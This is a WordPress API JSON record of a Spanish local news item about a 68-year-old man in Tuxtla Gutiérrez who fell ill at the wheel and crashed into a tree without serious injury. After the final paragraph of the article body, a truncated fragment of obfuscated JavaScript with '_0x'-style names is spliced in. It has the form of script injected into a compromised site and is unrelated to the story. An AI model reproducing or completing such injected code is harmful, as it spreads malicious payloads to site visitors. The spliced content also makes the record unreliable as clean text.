{"id":3186,"date":"2022-06-24T23:20:38","date_gmt":"2022-06-24T23:20:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3186"},"modified":"2022-06-24T23:20:39","modified_gmt":"2022-06-24T23:20:39","slug":"hombre-estrella-su-carro-contra-un-arbol","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3186","title":{"rendered":"Hombre estrella su carro contra un \u00e1rbol"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112280692-1024x576.jpg\" alt=\"\" class=\"wp-image-3187\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112280692-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112280692-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112280692-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112280692.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de Junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de 68 a\u00f1os de edad estrell\u00f3 su carro contra un \u00e1rbol a la altura del perif\u00e9rico Sur y 14 Poniente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Fue la ma\u00f1ana de este viernes cuando el hombre que manejaba un Honda tipo City de color gris en el sentido de Poniente a Oriente cuando se comenz\u00f3 a sentir mal por lo que perdi\u00f3 el control de su unidad.<\/p>\n\n\n\n<p>Esto lo llev\u00f3 a que se subiera al camell\u00f3n y se estrellara contra un \u00e1rbol que termin\u00f3 ca\u00eddo.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la CRM para valorar al herido que no present\u00f3 lesiones de gravedad.<\/p>\n\n\n\n<p>Una gr\u00faa se llev\u00f3 la unidad a un taller para la reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de Junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de 68 a\u00f1os de edad estrell\u00f3 su carro contra un \u00e1rbol a la altura del perif\u00e9rico Sur y 14 Poniente de Tuxtla Guti\u00e9rrez. Fue la ma\u00f1ana de este viernes cuando el hombre que manejaba un Honda tipo City de color gris &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3187,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3186","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3186","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3186"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3186\/revisions"}],"predecessor-version":[{"id":3188,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3186\/revisions\/3188"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3187"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}